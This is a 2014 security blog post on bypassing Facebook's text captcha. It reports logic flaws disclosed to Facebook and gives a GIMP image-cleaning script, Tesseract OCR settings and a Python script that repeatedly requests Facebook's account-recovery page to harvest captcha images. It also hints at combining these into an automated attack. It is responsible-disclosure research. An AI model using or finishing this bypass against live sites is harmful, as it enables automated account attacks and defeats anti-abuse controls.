Thursday, 10 July 2014

How to Bypass Facebook's Text Captcha

In this post I'll discuss Facebook's text captcha and how to bypass it with a little Gimp-Fu image cleaning and Tesseract OCR. The techniques below build on previous work where I demonstrated how to bypass Bugcrowd's captcha.


The Facebook Captcha(s)

I've seen Facebook use two captchas. The first is the friend photo captcha, where you are required to select your friends in pictures. This one seemed hard to bypass (except when you attack your friend's account and know all of their friends).


The second type is the text-based captcha, where you just enter the letters/numbers shown in the image. Something like this:


Let's look at some ways to bypass the text captcha :)


A couple of logic flaws...

My original aim was to focus on OCR with Tesseract but it turns out the captcha had logic flaws as well.

Issue #1 - When entering the captcha not all of the characters needed to be correct. If you got one character wrong it would still be accepted.

Issue #2 - The captcha check is case insensitive. Despite using uppercase and lowercase letters in the captcha images, the server didn't actually verify the case of user input.

Issue #3 - Captcha repetition...


Each captcha should have contained a dynamically generated string randomly chosen from a pool of 62^7 possibilities. For some reason though I encountered repetition. This is obviously very bad as with a limited set of captchas an attacker can just download every image, solve them all and achieve a 100% bypass rate in the future. I have no idea what the cause of this issue was and Facebook didn't release any details.

The logic flaws were interesting but let's not forget OCR as well!


Back to the image...

Let's take a look at a Facebook captcha image:


When thinking about OCR analysis there's some things to note:
  • Letters/numbers themselves are clearly displayed in black - Good
  • Minimal overlaying, wiggling and distortion is used - Good
  • Black scribbles add noise to the background - Bad
  • White scribbles effectively remove pixels from the characters - Bad
I did some testing with Tesseract and found noise, image size, character size and spacing all had a big impact on the accuracy of results. For example, directly analysing the image above will return invalid characters or no response at all. To improve Tesseract results I needed some way to get rid of the noise and repair damaged characters.


Step #1 Cleaning 

I chose to use Gimp for my image cleaning as it was a program I was familiar with and it offered command line processing with Python. While the documentation (here and here) and debugging aren't too good, it gets the job done.

So first up I loaded the image and increased its size, I found processing a smaller image was less accurate and would reduce the quality of the final image.
#Load image
image = pdb.gimp_file_load(file, file)
drawable = pdb.gimp_image_get_active_layer(image)
#Double image size
pdb.gimp_image_scale(image,560,142)

Next I removed the background noise. By selecting by black and then shrinking the selection, the thin black lines would be unselected, leaving just the black letters. To actually paint over the noise I just had to re-grow my selection, invert and paint white.
#Select by color black
pdb.gimp_by_color_select(drawable,"#000000",20,2,0,0,0,0)
#Shrink selection by 1 pixel
pdb.gimp_selection_shrink(image,1)
#Grow selection by 2 pixels
pdb.gimp_selection_grow(image,2)
#Fill black
pdb.gimp_context_set_foreground((0,0,0))
pdb.gimp_edit_fill(drawable,0)
pdb.gimp_edit_fill(drawable,0)
pdb.gimp_edit_fill(drawable,0)
#Invert selection
pdb.gimp_selection_invert(image)
#Fill white
pdb.gimp_context_set_foreground((255,255,255))
pdb.gimp_edit_fill(drawable,0)

With the outside black noise removed I inverted again to reselect the letters/numbers then translated up and down, painting after each translation. This helped fill in the white lines that in general streaked horizontally through the black characters.
#Invert selection
pdb.gimp_selection_invert(image)
pdb.gimp_context_set_foreground((0,0,0))
#Translate selection up 4 pixels and paint
pdb.gimp_selection_translate(image,0,4)
pdb.gimp_edit_fill(drawable,0)
#Translate selection down 10 pixels and paint
pdb.gimp_selection_translate(image,0,-10)
pdb.gimp_edit_fill(drawable,0)

With the processing done I resized the image back to its original size and saved it.
#Resize image
pdb.gimp_image_scale(image,280,71)
#Export
pdb.gimp_file_save(image, drawable, file, file)
pdb.gimp_image_delete(image)

I've included the full script at the bottom of this post. I ran it with the following command:
gimp-console-2.8.exe -i -b "(python-clean RUN-NONINTERACTIVE \"test.png\")" -b "(gimp-quit 0)"

As an example, cleaning the image above I got this:



Step #2 Submitting to Tesseract

With the image now cleaned it was ready for Tesseract. To improve the accuracy of results I selected the single word mode (-psm 8) and used a custom character set (nobatch fb).
tesseract.exe test.jpg output -psm 8 nobatch fb

I created the fb character set in "C:\Program Files (x86)\Tesseract-OCR\tessdata\configs", it contained the following whitelist:
tessedit_char_whitelist abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890


Step #3 Automate everything with Python

I didn't bother to build a fully working POC to automate a real attack - I'm leaving this step as homework for you guys, best script wins $1 via Paypal ;) (I am of course joking don't actually do this!)

Theoretically though if you did want to build a fully functioning script you'd just need to take the python script from my Bugcrowd post and cleaning script from this post, combine and pwn.

Also the following can be used to download Facebook captchas after you have triggered the Facebook defenses:
from urllib.error import *
from urllib.request import *
from urllib.parse import *
import re
import subprocess

def getpage():
    try:
        print("[+] POSTing to fb");
        params = {'lsd':'AVrQ4y7A', 'email':'09262073366', 'did_submit':'Search', '__user':'0', '__a':'1', '__dyn':'7wiUdp87ebG58mBWo', '__req':'p','__rev':'1114696','captcha_persist_data':'abc','recaptcha_challenge_field':'','captcha_response':'abc','confirmed':'1'}
        data = urlencode(params).encode('utf-8')
        request = Request("https://www.facebook.com/ajax/login/help/identify.php?ctx=recover")
        request.add_header('Cookie', 'locale=en_GB;datr=Ku2xUhSA3kShtkMud0JXRHCY; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2F%3Fstype%3Dlo%26jlou%3DAfco_1iUuf5XPNAuu9SBYhFnEoJfgxIw_9vwHlTfaTRjGB2Ac4VOSLHb018RjcLg3JVRsiY-sQlRSM00X59eKhLh5SJGHltQ0hEQ2WAiRR9A_g%26smuh%3D28853%26lh%3DAc-vs8zSU-_-6kh2%26aik%3Dqh9ABV52OPB3zXxCyUTNXw;')
        #Send request and analyse response
        f = urlopen(request, data)
        response = f.read().decode('utf-8')
        global ccode
        ccode = re.findall('[a-z0-9-]{43}', response)
        global chash
        chash = re.findall('[a-zA-Z0-9_-]{814}', response)
        print("[+] Parsed response");
    except URLError as e:
        print ("*****Error: Cannot retrieve URL*****");

def getcaptcha(i):
    try:
        print("[+] Downloading Captcha");
        captchaurl = "https://www.facebook.com/captcha/tfbimage.php?captcha_challenge_code="+ccode[0]+"&captcha_challenge_hash="+chash[1]
        urlretrieve(captchaurl,'fbcap'+str(i)+'.png')
    except URLError as e:
        print ("*****Error: Cannot retrieve URL*****");

print("[+] Start!");
for i in range(0, 1000):
    #Download page and parse data
    getpage();
    #Download captcha image
    getcaptcha(i);
print("[+] Finished!");



Final Results

So I guess you're wondering, how accurate was Tesseract? Well on a sample of 50 captchas that had been cleaned with Gimp, Tesseract was able to analyse them 100% correctly about 20% of the time. However taking into account the logic flaws the actual pass rate jumped to 50%.

Some example results:


It's quite impressive seeing how well both the Gimp cleaning and Tesseract analysis performed. Although you can also see how even subtle changes in the initial image can significantly affect both cleaning output and final analysis.


Facebook Fix #1

After reporting these issues the captcha repetition was addressed pretty quickly. The other logic flaws were left unchanged. The image itself was modified to make the characters/noise thicker:


Unfortunately this had little effect on the captcha strength as it's the noise to character relative thickness that mattered not the absolute thickness. Making the noise thicker and characters thinner, would have prevented noise removal through selection shrinking.


Final Thoughts

Another day, another captcha bypass. Whether you use Tesseract or a bad-ass custom neural network like Google or Vicarious, text captchas can be bypassed with relative ease. I managed a 20% pass-rate, I'm sure with a better cleaning process and/or Tesseract training this could be pushed a lot higher. It's time to ditch that text captcha.

Facebook said that right now the captcha is used more as a mechanism to slow down attacks as opposed to stopping attacks completely. The captcha will eventually be fixed but there are no plans at the moment.

Shout out to Facebook security for their help looking into this issue. Thanks for reading. Questions and comments are always appreciated, just leave a message below.

Pwndizzle out


############################################
#Gimp-Fu cleaning script, based on stackoverflow script here:
#http://stackoverflow.com/questions/12662676/writing-a-gimp-python-script?rq=1

from gimpfu import pdb, main, register, PF_STRING

def clean(file):
    #Load image
    image = pdb.gimp_file_load(file, file)
    drawable = pdb.gimp_image_get_active_layer(image)
    #Double image size
    pdb.gimp_image_scale(image,560,142)
    #Select by color black
    pdb.gimp_by_color_select(drawable,"#000000",20,2,0,0,0,0)
    #Shrink selection by 1 pixel
    pdb.gimp_selection_shrink(image,1)
    #Grow selection by 2 pixels
    pdb.gimp_selection_grow(image,2)
    #Fill black
    pdb.gimp_context_set_foreground((0,0,0))
    pdb.gimp_edit_fill(drawable,0)
    pdb.gimp_edit_fill(drawable,0)
    pdb.gimp_edit_fill(drawable,0)
    #Invert selection
    pdb.gimp_selection_invert(image)
    #Fill white
    pdb.gimp_context_set_foreground((255,255,255))
    pdb.gimp_edit_fill(drawable,0)
    #Invert selection
    pdb.gimp_selection_invert(image)
    pdb.gimp_context_set_foreground((0,0,0))
    #Translate selection up 4 pixels and paint
    pdb.gimp_selection_translate(image,0,4)
    pdb.gimp_edit_fill(drawable,0)
    #Translate selection down 10 pixels and paint
    pdb.gimp_selection_translate(image,0,-10)
    pdb.gimp_edit_fill(drawable,0)
    #Resize image
    pdb.gimp_image_scale(image,280,71)
    #Export
    pdb.gimp_file_save(image, drawable, file, file)
    pdb.gimp_image_delete(image)

args = [(PF_STRING, 'file', 'GlobPattern', '*.*')]
register('python-clean', '', '', '', '', '', '', '', args, [], clean)

main()

############################################

6 comments:

  1. Hi,

    Your gimp script is no more remove all the disturbance from the image. I am creating facebook captha reader. Would you help me in this?

    ReplyDelete
  2. Your gimp script is no more remove all the disturbance from the image. I am creating facebook captha reader. Would you help me in this?
    Reply

    ReplyDelete
  3. Unfortunately I'm busy with other work right now. Don't give up though, filtering should be able to help with a lot of different captcha variations :)

    ReplyDelete
  4. I should say only that its awesome! The blog is informational and always produce amazing things.
    facebook

    ReplyDelete